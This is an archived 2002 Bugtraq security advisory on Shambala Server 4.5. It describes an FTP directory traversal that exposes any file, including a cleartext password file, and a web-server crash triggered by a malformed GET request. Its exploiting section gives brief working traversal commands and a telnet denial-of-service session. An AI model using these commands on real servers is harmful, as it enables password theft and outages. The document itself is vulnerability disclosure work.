[[ TH 026 Inc. ]] SA #3 - Shambala Server 4.5, Directory Traversal and DoS

From: Daniel Nyström (exce@netwinder.nu)
Date: 05/31/02 

Date: Fri, 31 May 2002 00:21:30 +0200
From: Daniel Nyström <exce@netwinder.nu>
To: bugtraq@securityfocus.com

  Telhack 026 Inc. Security Advisory - #3
_________________________________________

Name: Shambala Server 4.5
Impact: Major (FTP Server vuln.), Medium (Web Server vuln.)
Date: June 30 / 2002
_________________________________________

Daniel Nyström a.k.a. excE <exce@netwinder.nu>

_I N F O_

Shambala Server is a personal Web/FTP server for Win 9*/NT.
When the web server is started it also starts the integrated
FTP server. There are are two previous issues that has been
disclosed on bugtraq by zillion in 2000 but he seem to have
missed these things.

Both of them: http://online.securityfocus.com/archive/1/138501

Vendor is at: http://www.evolvable.com , and yes, they were notified,
see bottom.

_P R O B L E M_

The integrated FTP server is vulnerable to a directory traversal
attack, that enables attackers to view the entire directory
structure and also download any file in it. There are also a
DoS condition present in the web server.

_I M P A C T_

An authenticated user may view any directory and/or download
any file on the system. An authenticated user may use this
to download the !_cleartext_! password file that lies one ..
below the web root.

I have also found a DoS condition in the Web server that
generates "Run-time error'5': Invalid procedure call or argument"
and crashes the server.

According to www.download.com, the program has been downloaded
57,957 times and 40 times last week. So it seems like this program
is still at use.

_E X P L O I T I N G_

Directory traversal / get any file
----------------------------------
ftp> ls ../../../ - and so on...
ftp> get ../../../ - and so on...

DoS condition in the Web server
-------------------------------
you# telnet 192.168.0.11 80
Trying 192.168.0.11...
Connected to 192.168.0.11.
Escape character is '^]'.
GET !"#¤%&/()=?
Connection closed by foreign host.
you#

_F I X E S_

Spent almost 20 minutes digging in the evolvable.com website for
an e-mail adress to contact them by, but none found. So I ended
up taking the e-mail adress from another (2 year old) advisory.
Still no reply. So the fix for now is: Uninstall Shambala.

/Daniel Nyström a.k.a. excE @ Telhack 026 Inc.

http://www.swesec.tk
http://www.telhack.tk

Relevant Pages

  • Re: write with cURL
    ... execute permissions. ... This is assuming that the PHP script runs ... of potential security risks from other users on the same server. ... web server itself is part of the group. ...
    (alt.php)
  • Re: web service architecture question
    ... To assume that we have all the security we will ever need is a bad one. ... ways to breach a server, and the separatin of the web and app server is one ... You can use remoting or web services. ... The web server will be exposed outside the ...
    (microsoft.public.dotnet.framework.webservices)
  • RE: System.Data.SqlClient "Timeout expired" causing ASP.net web applic
    ... There are many values here that can shutdown the aspnet_wp. ... > update tables on a Web Server running SQL Server 2000. ... > formation(DataSet currentBalances): Timeout expired. ...
    (microsoft.public.dotnet.languages.vb)
  • RE: System.Data.SqlClient "Timeout expired" causing ASP.net web applic
    ... There are many values here that can shutdown the aspnet_wp. ... > update tables on a Web Server running SQL Server 2000. ... > formation(DataSet currentBalances): Timeout expired. ...
    (microsoft.public.dotnet.framework.aspnet)
  • RE: System.Data.SqlClient "Timeout expired" causing ASP.net web applic
    ... There are many values here that can shutdown the aspnet_wp. ... > update tables on a Web Server running SQL Server 2000. ... > formation(DataSet currentBalances): Timeout expired. ...
    (microsoft.public.dotnet.framework.adonet)